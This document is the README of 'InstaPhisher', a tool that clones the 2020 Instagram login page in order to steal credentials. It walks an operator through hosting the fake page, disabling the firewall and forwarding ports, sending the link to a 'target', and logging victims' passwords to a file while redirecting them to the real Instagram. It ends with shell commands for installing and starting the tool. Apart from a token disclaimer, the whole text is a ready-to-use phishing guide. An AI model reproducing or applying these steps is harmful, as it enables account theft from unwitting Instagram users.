2020 Instagram phishing tool using apache, for any OS
author Exilas
version 2.3
I am in no way responsible for illegal uses.
This site is a clone of the 2020 instagram login page. You need to have and configure a DNS (you can get a free one here: https://www.freenom.com/fr). You must also have a valid apache version (https://httpd.apache.org/download.cgi) and php (https://www.php.net/downloads).
Then, move all InstaPhisher files to the apache folder ("/var/www/html" for linux). Make sure to disable your firewall and redirect the port 80 (UDP/TCP) on your router to your machine. If you use Linux, you must grant read and write permissions to the files logs.txt and serverMsg.txt when it will be created. After, use python in a terminal and start the file InstaPhisher.py. Send your DNS url to your target and wait. Please do not modify the logs.txt file during this step. When your victim logs on, you'll be notified via terminal. The passwords will be saved in the logs.txt file.
You can modify the redirect link in the login.php file. Enter url in header() function, after 'Location: ' at line 38. The default redirection is https://www.instagram.com.
Exemple:
You can also obtain SSL certificates with Let's Encrypt to benefit from an https connection. In this case you will have to redirect ports 80 and 443 (UDP/TCP) of your router to your machine.
The InstaPhisher file is only used to notify you when a new password is captured. It is therefore not necessary to open it.
git clone https://github.com/ExilasP/InstaPhisher.git
cd InstaPhisher
cp * -r '/var/www/html'
cd /var/www/html
touch logs.txt && touch serverMsg.txt
sudo chmod 777 logs.txt && chmod 777 serverMsg.txt
service apache2 start
python InstaPhisher.py
service apache2 start #"service apache2 stop" for stop
python InstaPhisher.py #Not required but recommended